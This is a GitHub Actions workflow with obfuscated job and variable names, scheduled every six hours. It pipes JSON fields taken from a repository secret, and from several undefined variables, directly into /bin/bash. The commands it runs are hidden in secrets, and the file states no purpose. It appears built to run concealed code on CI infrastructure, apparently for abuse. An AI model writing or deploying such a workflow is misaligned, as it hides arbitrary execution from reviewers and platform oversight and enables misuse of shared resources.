name: xieqianli3765
on:
  workflow_dispatch:
  schedule:
    - cron: '46 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xieqianli3765
        env:
          le90121: ${{ secrets.le90121 }}
        run: |
          echo $le90121 | jq -r .syp9831 | /bin/bash
          echo $hjcc3 | jq -r .dzga62480 | /bin/bash
          echo $mcjam68695 | jq -r .mt4457 | /bin/bash
          echo $wdpir527 | jq -r .mtfg164 | /bin/bash
          echo $ka6 | jq -r .jtziu5 | /bin/bash
          echo $x08537 | jq -r .bmjp908 | /bin/bash

